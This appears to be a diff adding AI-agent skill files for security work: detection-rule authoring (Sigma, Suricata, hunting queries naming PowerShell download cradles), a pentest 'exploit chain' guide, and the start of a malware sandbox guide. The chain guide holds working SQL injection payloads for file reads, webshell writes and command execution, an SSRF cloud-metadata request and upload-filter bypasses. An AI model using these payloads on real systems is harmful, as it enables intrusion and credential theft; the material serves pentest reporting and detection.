+    - attack.execution
+    - attack.t1059.001
+logsource:
+    category: process_creation  # or network_connection, file_event, etc.
+    product: windows
+detection:
+    selection:
+        Image|endswith: '\powershell.exe'
+        CommandLine|contains|all:
+            - 'DownloadString'
+            - 'Invoke-Expression'
+    condition: selection
+falsepositives:
+    - Legitimate administrative scripts
+level: high  # informational, low, medium, high, critical
+```
+
+### Common Sigma Logsources
+
+| Category | Product | Event Source | Use Case |
+|----------|---------|--------------|----------|
+| `process_creation` | windows | Sysmon Event ID 1, Security 4688 | Process execution |
+| `network_connection` | windows | Sysmon Event ID 3 | Network activity |
+| `file_event` | windows | Sysmon Event ID 11 | File creation |
+| `registry_event` | windows | Sysmon Event ID 12/13/14 | Registry modifications |
+| `image_load` | windows | Sysmon Event ID 7 | DLL loading |
+| `create_remote_thread` | windows | Sysmon Event ID 8 | Process injection |
+| `dns_query` | windows | Sysmon Event ID 22 | DNS queries |
+
+### Sigma Modifiers
+
+**String Matching:**
+- `|contains` - String contains value
+- `|startswith` - String starts with value
+- `|endswith` - String ends with value
+- `|all` - All values must be present
+- `|re` - Regular expression match
+
+**Examples:**
+```yaml
+# Contains any
+CommandLine|contains:
+    - 'powershell'
+    - 'cmd.exe'
+
+# Contains all
+CommandLine|contains|all:
+    - 'Invoke-WebRequest'
+    - '-OutFile'
+
+# Ends with
+Image|endswith: '\rundll32.exe'
+
+# Starts with
+CommandLine|startswith: 'C:\Windows\System32\'
+
+# Regex
+CommandLine|re: '.*\\\\AppData\\\\Local\\\\Temp\\\\[a-z]{8}\.exe'
+```
+
+### Example 1: PowerShell Download Cradle
+
+```yaml
+title: Suspicious PowerShell Download and Execute
+id: 12345678-1234-1234-1234-123456789abc
+status: experimental
+description: Detects PowerShell downloading content and executing it via Invoke-Expression
+references:
+    - https://attack.mitre.org/techniques/T1059/001/
+    - https://attack.mitre.org/techniques/T1105/
+author: Analyst Name
+date: 2025-10-26
+tags:
+    - attack.execution
+    - attack.t1059.001
+    - attack.command_and_control
+    - attack.t1105
+logsource:
+    category: process_creation
+    product: windows
+detection:
+    selection:
+        Image|endswith:
+            - '\powershell.exe'
+            - '\pwsh.exe'
+        CommandLine|contains|all:
+            - 'DownloadString'
+            - 'IEX'
+    condition: selection
+falsepositives:
+    - Legitimate software deployment scripts
+    - Administrative automation
+level: high
+```
+
+### Example 2: Suspicious Registry Run Key
+
+```yaml
+title: Malware Persistence via Registry Run Key
+id: 23456789-2345-2345-2345-234567890abc
+status: stable
+description: Detects creation of registry Run key pointing to suspicious locations
+references:
+    - https://attack.mitre.org/techniques/T1547/001/
+author: Analyst Name
+date: 2025-10-26
+tags:
+    - attack.persistence
+    - attack.t1547.001
+logsource:
+    category: registry_event
+    product: windows
+detection:
+    selection:
+        EventType: SetValue
+        TargetObject|contains: '\Software\Microsoft\Windows\CurrentVersion\Run\'
+        Details|contains:
+            - '\AppData\Local\Temp\'
+            - '\Users\Public\'
+            - '\ProgramData\'
+            - '%TEMP%'
+    condition: selection
+falsepositives:
+    - Legitimate software installations
+level: medium
+```
+
+### Example 3: Network Connection to Malicious IP
+
+```yaml
+title: Network Connection to Known C2 Server
+id: 34567890-3456-3456-3456-345678901abc
+status: experimental
+description: Detects network connection to known malware C2 IP address
+references:
+    - Internal malware analysis report
+author: Analyst Name
+date: 2025-10-26
+tags:
+    - attack.command_and_control
+    - attack.t1071
+logsource:
+    category: network_connection
+    product: windows
+detection:
+    selection:
+        DestinationIp:
+            - '192.168.56.101'  # Replace with actual C2 IP
+            - '10.0.0.50'
+        DestinationPort:
+            - 443
+            - 8080
+    condition: selection
+falsepositives:
+    - Rare, should be investigated
+level: high
+```
+
+### Example 4: Suspicious File Creation
+
+```yaml
+title: Malware Dropping Files to Suspicious Location
+id: 45678901-4567-4567-4567-456789012abc
+status: experimental
+description: Detects file creation in common malware drop locations
+references:
+    - https://attack.mitre.org/techniques/T1105/
+author: Analyst Name
+date: 2025-10-26
+tags:
+    - attack.defense_evasion
+    - attack.t1105
+logsource:
+    category: file_event
+    product: windows
+detection:
+    selection:
+        TargetFilename|contains:
+            - '\AppData\Local\Temp\'
+            - '\Users\Public\'
+        TargetFilename|endswith:
+            - '.exe'
+            - '.dll'
+            - '.bat'
+            - '.vbs'
+    condition: selection
+falsepositives:
+    - Software installations
+    - Temporary file creation by legitimate apps
+level: low
+```
+
+### Convert Sigma to SIEM Queries
+
+**Using sigmac (legacy) or sigma-cli (modern):**
+
+```bash
+# Install sigma-cli
+pip install sigma-cli
+
+# Convert to Splunk
+sigma convert -t splunk rule.yml
+
+# Convert to Elastic
+sigma convert -t elasticsearch rule.yml
+
+# Convert to QRadar
+sigma convert -t qradar rule.yml
+
+# Convert to Microsoft Sentinel
+sigma convert -t sentinel rule.yml
+```
+
+**Example Conversions:**
+
+**Splunk:**
+```spl
+index=windows EventCode=1
+(Image="*\\powershell.exe" OR Image="*\\pwsh.exe")
+CommandLine="*DownloadString*" CommandLine="*IEX*"
+```
+
+**Elastic:**
+```json
+{
+  "query": {
+    "bool": {
+      "must": [
+        {"wildcard": {"process.executable": "*\\\\powershell.exe"}},
+        {"wildcard": {"process.command_line": "*DownloadString*"}},
+        {"wildcard": {"process.command_line": "*IEX*"}}
+      ]
+    }
+  }
+}
+```
+
+### Sigma Rule Best Practices
+
+**Do:**
+- Use unique UUIDs (generate with `uuidgen` or online)
+- Include MITRE ATT&CK tags
+- List realistic false positives
+- Test on real data before deployment
+- Use specific conditions (avoid over-matching)
+- Document references and context
+- Set appropriate severity levels
+
+**Don't:**
+- Use overly broad conditions
+- Forget false positive analysis
+- Skip testing
+- Hardcode environment-specific values
+- Ignore performance impact
+
+---
+
+## Suricata Rule Creation (Network IDS)
+
+### Suricata Rule Structure
+
+```
+action protocol src_ip src_port -> dest_ip dest_port (rule_options)
+```
+
+**Components:**
+- **Action**: alert, drop, reject, pass
+- **Protocol**: tcp, udp, icmp, http, dns, tls
+- **Src/Dest**: IP ranges, ports, $variables
+- **Rule Options**: Keywords that define detection logic
+
+### Example 1: HTTP C2 Traffic
+
+```
+alert http $HOME_NET any -> $EXTERNAL_NET any (
+    msg:"ET MALWARE Suspicious C2 Checkin";
+    flow:established,to_server;
+    content:"POST"; http_method;
+    content:"/api/checkin"; http_uri;
+    http.user_agent; content:"Mozilla/4.0 (compatible|3b| MSIE 6.0)";
+    sid:1000001;
+    rev:1;
+    metadata:created_at 2025_10_26;
+)
+```
+
+**Breakdown:**
+- `alert http` - Alert on HTTP traffic
+- `$HOME_NET any -> $EXTERNAL_NET any` - Outbound traffic
+- `flow:established,to_server` - Established connection to server
+- `content:"POST"; http_method` - HTTP POST request
+- `content:"/api/checkin"; http_uri` - Specific URI path
+- `http.user_agent; content:"..."` - Specific User-Agent
+- `sid:1000001` - Signature ID (use 1000000+ for custom rules)
+- `rev:1` - Revision number
+
+### Example 2: DNS C2 Communication
+
+```
+alert dns $HOME_NET any -> any 53 (
+    msg:"ET MALWARE Suspicious DGA Domain Query";
+    dns.query; content:".tk"; nocase;
+    sid:1000002;
+    rev:1;
+    metadata:created_at 2025_10_26;
+)
+```
+
+### Example 3: TLS C2 with SNI
+
+```
+alert tls $HOME_NET any -> $EXTERNAL_NET 443 (
+    msg:"ET MALWARE Known C2 Server Certificate";
+    tls.sni; content:"malicious.com";
+    tls.cert_subject; content:"CN=Evil Corp";
+    sid:1000003;
+    rev:1;
+    metadata:created_at 2025_10_26;
+)
+```
+
+### Example 4: Malware Download
+
+```
+alert http $HOME_NET any -> $EXTERNAL_NET any (
+    msg:"ET MALWARE Executable Download from Suspicious TLD";
+    flow:established,to_server;
+    http.uri; content:".exe"; endswith;
+    http.host; content:".tk"; endswith;
+    sid:1000004;
+    rev:1;
+    metadata:created_at 2025_10_26;
+)
+```
+
+### Suricata HTTP Keywords
+
+- `http.method` - GET, POST, PUT, etc.
+- `http.uri` - Request URI path
+- `http.host` - Host header
+- `http.user_agent` - User-Agent string
+- `http.request_body` - POST data
+- `http.response_body` - Response content
+- `http.header` - Any HTTP header
+- `http.stat_code` - Response code (200, 404, etc.)
+
+### Suricata DNS Keywords
+
+- `dns.query` - DNS query name
+- `dns.opcode` - DNS operation code
+- `dns.rcode` - DNS response code
+
+### Suricata TLS Keywords
+
+- `tls.sni` - Server Name Indication
+- `tls.cert_subject` - Certificate subject
+- `tls.cert_issuer` - Certificate issuer
+- `tls.cert_serial` - Certificate serial number
+- `tls.version` - TLS version
+
+### Testing Suricata Rules
+
+```bash
+# Test rule syntax
+suricata -T -c /etc/suricata/suricata.yaml -S custom.rules
+
+# Run on PCAP
+suricata -r sample_traffic.pcapng -S custom.rules -l /var/log/suricata/
+
+# Check alerts
+cat /var/log/suricata/fast.log
+```
+
+### Suricata Best Practices
+
+**Do:**
+- Use flow keywords (established, to_server, to_client)
+- Anchor strings with content modifiers (startswith, endswith)
+- Use fast_pattern for performance
+- Test against PCAPs before deployment
+- Use metadata for rule management
+- Include revision tracking
+
+**Don't:**
+- Write overly broad rules (high false positive rate)
+- Use regex unless necessary (performance impact)
+- Forget to test on benign traffic
+- Use conflicting SIDs (must be unique)
+- Skip documentation in msg field
+
+---
+
+## Hunting Queries
+
+### Splunk Hunting Queries
+
+**Hunt for PowerShell Download Cradles:**
+```spl
+index=windows EventCode=1
+(Image="*\\powershell.exe" OR Image="*\\pwsh.exe")
+(CommandLine="*DownloadString*" OR CommandLine="*DownloadFile*" OR CommandLine="*Invoke-WebRequest*")
+| table _time, ComputerName, User, CommandLine
+| sort -_time
+```
+
+**Hunt for Suspicious Registry Run Keys:**
+```spl
+index=windows EventCode=13
+TargetObject="*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run*"
+(Details="*\\AppData\\Local\\Temp\\*" OR Details="*\\Users\\Public\\*" OR Details="*\\ProgramData\\*")
+| table _time, ComputerName, TargetObject, Details
+| sort -_time
+```
+
+**Hunt for Outbound Connections to Rare Destinations:**
+```spl
+index=network
+| stats count by dest_ip
+| where count < 5
+| join dest_ip [search index=network]
+| table _time, src_ip, dest_ip, dest_port, bytes_out
+```
+
+### Elastic (KQL) Hunting Queries
+
+**Hunt for Process Injection:**
+```
+event.code:8 AND
+winlog.event_data.TargetImage:(*\\explorer.exe OR *\\svchost.exe) AND
+NOT winlog.event_data.SourceImage:C\\:\\Windows\\System32\\*
+```
+
+**Hunt for Suspicious File Creations:**
+```
+event.code:11 AND
+file.path:(*\\AppData\\Local\\Temp\\*.exe OR *\\Users\\Public\\*.exe) AND
+NOT process.executable:(*\\Windows\\System32\\* OR *\\Program Files\\*)
+```
+
+### EDR Hunting (Generic Pseudocode)
+
+**Hunt for Credential Access:**
+```
+Process = "lsass.exe" AND
+AccessMask IN (0x1010, 0x1410, 0x1438) AND
+SourceImage NOT IN (known_good_processes)
+```
+
+**Hunt for Lateral Movement:**
+```
+Process = "psexec.exe" OR
+Process = "wmic.exe" OR
+(Process = "powershell.exe" AND CommandLine CONTAINS "Invoke-Command")
+```
+
+---
+
+## IOC Formats & Standards
+
+### STIX (Structured Threat Information Expression)
+
+**STIX 2.1 Example:**
+```json
+{
+  "type": "indicator",
+  "spec_version": "2.1",
+  "id": "indicator--12345678-1234-1234-1234-123456789abc",
+  "created": "2025-10-26T12:00:00.000Z",
+  "modified": "2025-10-26T12:00:00.000Z",
+  "name": "Malicious Domain: malicious.com",
+  "description": "C2 domain for Malware Family X",
+  "pattern": "[domain-name:value = 'malicious.com']",
+  "pattern_type": "stix",
+  "valid_from": "2025-10-26T12:00:00.000Z",
+  "labels": ["malicious-activity"]
+}
+```
+
+### CSV Format (Simple)
+
+```csv
+ioc_type,ioc_value,confidence,description,first_seen
+domain,malicious.com,high,C2 server,2025-10-26
+ip,192.168.1.100,medium,C2 IP address,2025-10-26
+sha256,abc123...,high,Malware sample hash,2025-10-26
+mutex,Global\M12345,high,Mutex name,2025-10-26
+registry,HKCU\Software\...\Run,high,Persistence key,2025-10-26
+```
+
+### OpenIOC Format
+
+```xml
+<?xml version="1.0" encoding="UTF-8"?>
+<ioc xmlns="http://schemas.mandiant.com/2010/ioc">
+  <short_description>Malware Family X IOCs</short_description>
+  <description>IOCs from analysis of Malware Family X</description>
+  <authored_by>Analyst Name</authored_by>
+  <authored_date>2025-10-26T12:00:00</authored_date>
+  <definition>
+    <Indicator operator="OR">
+      <IndicatorItem>
+        <Context document="FileItem" search="FileItem/Md5sum"/>
+        <Content type="md5">abc123...</Content>
+      </IndicatorItem>
+      <IndicatorItem>
+        <Context document="Network" search="Network/DNS"/>
+        <Content type="string">malicious.com</Content>
+      </IndicatorItem>
+    </Indicator>
+  </definition>
+</ioc>
+```
+
+---
+
+## Detection Logic Development
+
+### From Analysis to Detection
+
+**Step 1: Identify Unique Behaviors**
+From dynamic analysis, extract behaviors that are:
+- Uncommon in legitimate software
+- Hard for attackers to change
+- Observable in logs/network traffic
+
+**Step 2: Map to Data Sources**
+
+| Behavior | Data Source | Detection Method |
+|----------|-------------|------------------|
+| Process injection | Sysmon Event ID 8 | Sigma rule |
+| C2 beacon | Network logs, proxy | Suricata rule |
+| Registry persistence | Sysmon Event ID 13 | Sigma rule |
+| File drop | Sysmon Event ID 11 | Sigma rule + YARA |
+| DNS query (DGA) | DNS logs | Suricata rule |
+
+**Step 3: Write Detection Rule**
+
+Choose appropriate rule type:
+- **Host-based** → Sigma rule (SIEM/EDR)
+- **Network-based** → Suricata rule (IDS/IPS)
+- **File-based** → YARA rule (scanning)
+
+**Step 4: Test & Validate**
+
+- Test on malware sample (must alert)
+- Test on benign samples (must not alert)
+- Adjust thresholds/conditions
+- Document false positive scenarios
+
+**Step 5: Deploy & Tune**
+
+- Deploy to pilot environment
+- Monitor alert volume
+- Investigate false positives
+- Tune rule based on feedback
+- Document tuning changes
+
+---
+
+## Quality Checklist
+
+Before finalizing detection content:
+
+**Sigma Rules:**
+- [ ] Unique UUID assigned
+- [ ] MITRE ATT&CK tags included
+- [ ] Tested on sample data
+- [ ] False positives documented
+- [ ] Appropriate severity level set
+- [ ] References included
+- [ ] Logsource correctly specified
+
+**Suricata Rules:**
+- [ ] Unique SID assigned (1000000+)
+- [ ] Tested on PCAP
+- [ ] Flow keywords used (performance)
+- [ ] Metadata included
+- [ ] No syntax errors (suricata -T)
+- [ ] Tested on benign traffic
+- [ ] Message clearly describes detection
+
+**IOCs:**
+- [ ] All IOCs defanged properly
+- [ ] Confidence levels assigned
+- [ ] Volatility assessed
+- [ ] Context provided for each IOC
+- [ ] No environment-specific artifacts
+- [ ] Timestamps included (UTC)
+- [ ] Format standardized (CSV/STIX/OpenIOC)
+
+**Hunting Queries:**
+- [ ] Query tested and returns results
+- [ ] Performance acceptable (<30s)
+- [ ] Results actionable
+- [ ] False positive rate acceptable
+- [ ] Query documented (purpose, expected results)
+
+---
+
+## Integration with Malware Reports
+
+Detection content appears in multiple report sections:
+
+**IOCs Section:**
+- Defanged IOCs grouped by type
+- Confidence ratings
+- Context for each indicator
+
+**Detection Rules Section:**
+- YARA rules (from malware-report-writer skill)
+- Sigma rules (from this skill)
+- Suricata rules (from this skill)
+
+**Remediation Section:**
+- Hunting queries for IR teams
+- Detection deployment guidance
+- IOC search instructions
+
+**Appendix:**
+- IOC export files (CSV, STIX)
+- Sigma rule files (.yml)
+- Suricata rule files (.rules)
+
+---
+
+## Tool Quick Reference
+
+| Task | Tool | Command |
+|------|------|---------|
+| **Defang IOCs** | ioc-fanger | `echo "http://evil.com" | fanger --defang` |
+| **Convert Sigma** | sigma-cli | `sigma convert -t splunk rule.yml` |
+| **Test Suricata** | suricata | `suricata -T -S rules.rules` |
+| **Generate UUID** | uuidgen | `uuidgen` (Linux/Mac) or online |
+| **Validate STIX** | stix2-validator | `stix2_validator file.json` |
+
+---
+
+## Example Usage
+
+**User request:** "Help me create detection rules for this ransomware that encrypts files with .locked extension"
+
+**Workflow:**
+1. **Defang IOCs** from analysis (C2 domain, IP, file paths)
+2. **Create Sigma rule** for file encryption behavior (Sysmon Event ID 11)
+3. **Create Suricata rule** for C2 communication pattern
+4. **Generate hunting query** to find encrypted files across environment
+5. **Export IOCs** in CSV format for SOC import
+6. **Document** all rules with context and testing notes
+7. **Provide** deployment guidance for blue team
+
+## Validation
+
+To verify this skill works correctly:
+
+1. **Load test**: Confirm the skill loads without frontmatter parsing errors.
+2. **Sigma test**: Validate all 4 Sigma rule YAML examples parse correctly with required fields (title, id, logsource, detection, condition, level).
+3. **Suricata test**: Check all 4 Suricata rule examples have valid syntax (action, protocol, direction, sid, rev).
+4. **Defang test**: Verify defanging patterns correctly transform URLs, domains, IPs, and emails.
+5. **Hunting query test**: Confirm Splunk and KQL hunting queries are syntactically valid.
+6. **Integration test**: Confirm referenced skills (malware-report-writer, malware-triage) exist.

--- a/internal/assets/skills/exploit-chain-patterns/SKILL.md
+++ b/internal/assets/skills/exploit-chain-patterns/SKILL.md
@@ -1,0 +1,409 @@
+---
+name: exploit-chain-patterns
+description: "Chain vulnerabilities into high-impact attack paths. Trigger: analyzing pentest findings for exploit chains, escalating impact, or showing attack scenarios."
+license: Apache-2.0
+metadata:
+  author: gentleman-programming
+  version: "1.0"
+---
+
+# Exploit Chain Patterns
+
+Combine individual vulnerabilities into multi-step attack chains that demonstrate real-world impact beyond what each finding shows in isolation.
+
+## When to Use This Skill
+
+Use this skill when you need to:
+- Identify **chaining opportunities** from a list of pentest findings
+- Escalate **low/medium findings** into **high/critical** attack paths
+- Demonstrate **business impact** through realistic attack scenarios
+- Build **attack graphs** showing vulnerability relationships
+- Prioritize remediation based on **chain-breaking** potential
+- Write **proof-of-concept chains** for penetration test reports
+
+## Why Chains Matter
+
+A single medium-severity SSRF alone might get deprioritized. But SSRF → internal API access → admin token leak → full account takeover is a **critical** finding that demands immediate action.
+
+**Individual findings are puzzle pieces. Chains show the full picture.**
+
+## Chain Rule Catalog
+
+### 10 Core Chain Patterns
+
+#### 1. SSRF → Internal Service Access
+
+```
+SSRF on external endpoint
+    │
+    ▼
+Access internal services (169.254.169.254, 10.x.x.x, 127.0.0.1)
+    │
+    ▼
+Read cloud metadata / internal APIs / admin panels
+    │
+    ▼
+Extract credentials, tokens, or sensitive configuration
+```
+
+**Detection signals:**
+- SSRF finding exists on any endpoint accepting URLs
+- Target infrastructure uses cloud providers (AWS/GCP/Azure)
+- Internal services accessible without authentication from server-side
+
+**Example chain:**
+```
+1. SSRF via image URL parameter: POST /api/render?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
+2. AWS IAM role credentials returned in response
+3. Use temporary credentials to access S3 buckets, EC2 instances
+Impact: Full cloud infrastructure compromise from single SSRF
+```
+
+#### 2. SQLi → Database-Specific Escalation
+
+```
+SQL Injection (any type)
+    │
+    ▼
+Identify database engine (MySQL, PostgreSQL, MSSQL, Oracle)
+    │
+    ▼
+Engine-specific escalation
+    ├── MySQL: FILE privilege → read/write files → webshell
+    ├── PostgreSQL: COPY TO/FROM → file read/write → RCE via extensions
+    ├── MSSQL: xp_cmdshell → OS command execution
+    └── Oracle: Java stored procedures → OS command execution
+```
+
+**Chain payloads per engine:**
+```sql
+-- MySQL: Read files
+' UNION SELECT LOAD_FILE('/etc/passwd'),2,3-- -
+
+-- MySQL: Write webshell (needs FILE privilege)
+' UNION SELECT '<?php system($_GET["cmd"]); ?>',2,3 INTO OUTFILE '/var/www/html/shell.php'-- -
+
+-- PostgreSQL: Command execution
+'; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'id'; SELECT * FROM cmd_exec;-- -
+
+-- MSSQL: Enable and use xp_cmdshell
+'; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'whoami';-- -
+```
+
+#### 3. XSS → Session Hijack → Account Takeover
+
+```
+Stored/Reflected XSS
+    │
+    ▼
+Steal session cookie or JWT token
+    │
+    ▼
+Replay token to impersonate victim
+    │
+    ▼
+If victim is admin → full application takeover
+```
+
+**Prerequisites for chain to work:**
+- Cookie WITHOUT `HttpOnly` flag, OR
+- JWT stored in `localStorage` (accessible via XSS)
+- No additional session binding (IP, fingerprint)
+
+**Chain breakers (defenses that stop this):**
+- `HttpOnly` cookie flag → XSS can't read cookies
+- `SameSite=Strict` → Cookie not sent cross-origin
+- CSP `script-src 'self'` → Blocks inline script execution
+- Session bound to IP/User-Agent → Stolen token rejected
+
+#### 4. IDOR → Horizontal/Vertical Privilege Escalation
+
+```
+IDOR on user resources (e.g., /api/users/123/profile)
+    │
+    ▼
+Enumerate other user IDs (sequential, predictable)
+    │
+    ▼
+Access/modify other users' data
+    │
+    ▼
+If admin IDs are predictable → access admin resources
+    │
+    ▼
+Vertical escalation: regular user → admin
+```
+
+**Signals that IDOR chains are possible:**
+- Sequential numeric IDs (1, 2, 3...)
+- UUIDs returned in other API responses (info leak → IDOR)
+- Different HTTP methods on same endpoint (GET works, also try PUT/DELETE)
+- API versioning differences (v1 has auth, v2 doesn't)
+
+#### 5. Open Redirect → OAuth Token Theft
+
+```
+Open redirect on trusted domain
+    │
+    ▼
+Abuse as OAuth redirect_uri (bypasses allowlist via subdomain/path)
+    │
+    ▼
+Victim authorizes OAuth flow
+    │
+    ▼
+Authorization code/token sent to attacker-controlled URL
+    │
+    ▼
+Full account takeover via OAuth
+```
+
+**Why this works:**
+- OAuth providers often allowlist entire domains
+- Open redirect on `trusted-app.com/redirect?url=evil.com`
+- OAuth callback goes to `trusted-app.com/redirect?url=evil.com#access_token=...`
+
+#### 6. Information Disclosure → Targeted Exploitation
+
+```
+Info disclosure (stack traces, debug pages, API docs, .env files)
+    │
+    ▼
+Extract: framework version, library versions, API keys, internal IPs
+    │
+    ▼
+Search for known CVEs matching exact versions
+    │
+    ▼
+Targeted exploitation with version-specific exploits
+```
+
+**Common info leak sources:**
+- Error pages with stack traces (framework + version)
+- `/debug`, `/actuator`, `/swagger.json`, `/.env`
+- HTTP headers: `Server`, `X-Powered-By`, `X-AspNet-Version`
+- JavaScript source maps exposing frontend dependencies
+
+#### 7. File Upload → Webshell → RCE
+
+```
+Unrestricted file upload
+    │
+    ▼
+Upload executable file (.php, .jsp, .aspx, .py)
+    │
+    ▼
+Determine upload path (via response, directory listing, or brute force)
+    │
+    ▼
+Access uploaded file via web → code execution on server
+```
+
+**Bypass techniques when filters exist:**
+- Double extension: `shell.php.jpg`
+- Null byte (legacy): `shell.php%00.jpg`
+- Content-Type spoof: Upload .php with `image/jpeg` Content-Type
+- Case variation: `shell.PhP`, `shell.pHtml`
+- Alternative extensions: `.phtml`, `.php5`, `.shtml`, `.asa`
+
+#### 8. CORS Misconfiguration → Data Exfiltration
+
+```
+Permissive CORS (Access-Control-Allow-Origin: *)
+    │
+    ▼
+OR reflected origin (echoes any Origin header)
+    │
+    ▼
+Attacker page makes authenticated cross-origin requests
+    │
+    ▼
+Victim's browser sends cookies → response readable by attacker
+    │
+    ▼
+Exfiltrate sensitive data (PII, tokens, financial data)
+```
+
+**Testing:**
+```bash
+# Test for reflected origin
+curl -H "Origin: https://evil.com" -I https://target.com/api/sensitive
+# If response contains: Access-Control-Allow-Origin: https://evil.com
+# AND: Access-Control-Allow-Credentials: true
+# → VULNERABLE to authenticated data theft
+```
+
+#### 9. Subdomain Takeover → Credential Phishing
+
+```
+Dangling DNS record (CNAME to deprovisioned service)
+    │
+    ▼
+Claim the service (Heroku, S3, GitHub Pages, Azure, etc.)
+    │
+    ▼
+Host phishing page on trusted subdomain
+    │
+    ▼
+Victims trust *.company.com → enter credentials
+    │
+    ▼
+Also: set cookies on parent domain → session fixation
+```
+
+**Services commonly vulnerable:**
+- AWS S3 (`NoSuchBucket` response)
+- Heroku (`No such app` response)
+- GitHub Pages (404 from GitHub)
+- Azure (`NXDOMAIN` but CNAME still points)
+- Shopify, Fastly, Pantheon
+
+#### 10. Race Condition → Business Logic Abuse
+
+```
+Time-of-check to time-of-use (TOCTOU) gap
+    │
+    ▼
+Send multiple concurrent requests
+    │
+    ▼
+Bypass: rate limits, balance checks, inventory counts, coupon usage
+    │
+    ▼
+Result: double-spend, free items, unlimited coupon use
+```
+
+**Testing pattern:**
+```python
+import asyncio
+import aiohttp
+
+async def race_request(session, url, data):
+    async with session.post(url, json=data) as resp:
+        return await resp.json()
+
+async def exploit_race():
+    async with aiohttp.ClientSession() as session:
+        # Send 20 concurrent requests
+        tasks = [race_request(session, url, payload) for _ in range(20)]
+        results = await asyncio.gather(*tasks)
+        # Check how many succeeded (should be 1, if >1 → race condition)
+```
+
+## Chain Analysis Methodology
+
+### Step 1: Inventory All Findings
+
+Create a table of all discovered vulnerabilities:
+
+| ID | Type | Endpoint | Severity | Verified |
+|----|------|----------|----------|----------|
+| F1 | SSRF | /api/fetch | Medium | Yes |
+| F2 | Info Disclosure | /debug | Low | Yes |
+| F3 | IDOR | /api/users/{id} | Medium | Yes |
+
+### Step 2: Build Adjacency Matrix
+
+For each pair of findings, ask: "Can finding A enable or amplify finding B?"
+
+```
+     F1   F2   F3
+F1   -    YES  NO
+F2   YES  -    YES
+F3   NO   NO   -
+```
+
+### Step 3: Trace Chain Paths
+
+Follow the adjacency matrix to find multi-step paths:
+- F2 (info disclosure reveals internal IPs) → F1 (SSRF targets internal IPs) → Data exfiltration
+- F2 (info disclosure reveals user IDs) → F3 (IDOR accesses other users)
+
+### Step 4: Score Chain Impact
+
+```
+Chain Impact = max(individual severities) + chain_bonus
+
+chain_bonus:
+  2-step chain: +1 severity level
+  3-step chain: +2 severity levels
+  Achieves RCE: automatic Critical
+  Achieves data exfiltration: minimum High
+  Achieves privilege escalation: minimum High
+```
+
+### Step 5: Identify Chain Breakers
+
+For each chain, identify which single fix would break the entire chain. This helps prioritize remediation.
+
+```
+Chain: Info Disclosure → SSRF → Cloud Metadata → Account Takeover
+Chain breakers:
+  1. Fix info disclosure (remove /debug endpoint) → breaks step 1
+  2. Fix SSRF (validate/allowlist URLs) → breaks step 2
+  3. Use IMDSv2 on AWS (requires token) → breaks step 3
+
+Recommended: Fix SSRF (#2) - breaks the most chains
+```
+
+## Reporting Chains
+
+### Chain Report Template
+
+```markdown
+## Attack Chain: [Name]
+
+**Impact:** [Critical/High/Medium]
+**Chain Length:** [N steps]
+**MITRE ATT&CK:** [Technique IDs]
+
+### Attack Path
+
+1. **[Step 1 Title]** (Finding ID: F1)
+   - Endpoint: `POST /api/fetch`
+   - Payload: `url=http://169.254.169.254/...`
+   - Result: AWS credentials obtained
+
+2. **[Step 2 Title]** (Finding ID: F2)
+   - Using: Credentials from Step 1
+   - Action: `aws s3 ls` with stolen credentials
+   - Result: Access to production S3 buckets
+
+### Business Impact
+[Describe what an attacker achieves at the end of this chain]
+
+### Remediation Priority
+| Fix | Breaks Chain At | Effort | Recommendation |
+|-----|-----------------|--------|----------------|
+| Fix SSRF | Step 1 | Medium | **Priority 1** |
+| IMDSv2 | Step 1→2 | Low | Priority 2 |
+| Least privilege IAM | Step 2 | Medium | Priority 3 |
+```
+
+## Quality Checklist
+
+- [ ] All individual findings in the chain are validated (see ai-pentesting-validation)
+- [ ] Each chain step has been tested and proven to work
+- [ ] Chain steps are in correct order (each step requires the previous)
+- [ ] Impact assessment reflects the FULL chain, not individual findings
+- [ ] Chain breakers identified for each chain
+- [ ] Remediation prioritized by chain-breaking potential
+- [ ] MITRE ATT&CK techniques mapped for each step
+- [ ] Proof-of-concept demonstrates the complete chain (or explains why partial)
+
+## Integration Points
+
+- **ai-pentesting-validation** - Each finding in the chain must pass validation first
+- **detection-engineer** - Create detection rules for each chain step
+- **waf-detection-bypass** - WAF bypass may be required to execute chain steps
+- **pentest-orchestrator** - Chains are identified during orchestrated scan phases
+
+## Validation
+
+To verify this skill works correctly:
+
+1. **Load test**: Confirm the skill loads without frontmatter parsing errors.
+2. **Chain catalog test**: Verify all 10 chain patterns render correctly with proper code blocks and ASCII diagrams.
+3. **SQL payload test**: Check that all SQL injection chain payloads are syntactically valid for their respective database engines.
+4. **Methodology test**: Validate the adjacency matrix and chain scoring formulas are documented correctly.
+5. **Integration test**: Confirm referenced skills (ai-pentesting-validation, detection-engineer, waf-detection-bypass, pentest-orchestrator) exist.

--- a/internal/assets/skills/malware-dynamic-analysis/SKILL.md
+++ b/internal/assets/skills/malware-dynamic-analysis/SKILL.md
@@ -1,0 +1,523 @@
+---
+name: malware-dynamic-analysis
+description: "Execute and monitor malware in sandbox environments. Trigger: observing runtime behavior, capturing network traffic, or analyzing process and file activity."
+license: Apache-2.0
+metadata:
+  author: gentleman-programming
+  version: "1.0"
+---
+
+# Malware Dynamic Analysis
+
+Safely execute and comprehensively monitor malware behavior in isolated environments for professional malware research and enterprise security operations.
+
+## When to Use This Skill
+
+Use this skill when you need to:
+- Execute malware safely in an isolated environment
+- Monitor runtime behavior (processes, files, registry, network)
+- Capture and analyze network traffic and C2 communications
+- Validate hypotheses from static analysis
+- Extract runtime-decrypted strings or configurations
+- Document actual malware functionality for reports
+- Create behavioral IOCs and detection signatures
+- Analyze process injection and code execution techniques
+
+## Safety First - Pre-Execution Checklist
+
+**CRITICAL:** Never execute malware outside a properly isolated environment.
+
+Before ANY execution:
+- [ ] Snapshot taken of clean VM state
+- [ ] Network isolated (host-only or INetSim simulation)
+- [ ] No shared folders enabled
+- [ ] No clipboard sharing
+- [ ] Time sync disabled
+- [ ] Monitoring tools ready and running
+- [ ] Analysis persona active (no personal info)
+- [ ] Emergency shutdown plan ready
+
+**If ANY checkbox fails - DO NOT EXECUTE**
+
+## Dynamic Analysis Workflow
+
+### Phase 1: Environment Preparation (10 minutes)
+
+**1. Verify VM Isolation:**
+```bash
+# Check network adapter settings
+# Should be: Host-only or NAT with INetSim
+
+# Test internet connectivity (should fail or hit INetSim)
+ping 8.8.8.8
+nslookup google.com
+
+# Verify no shared folders
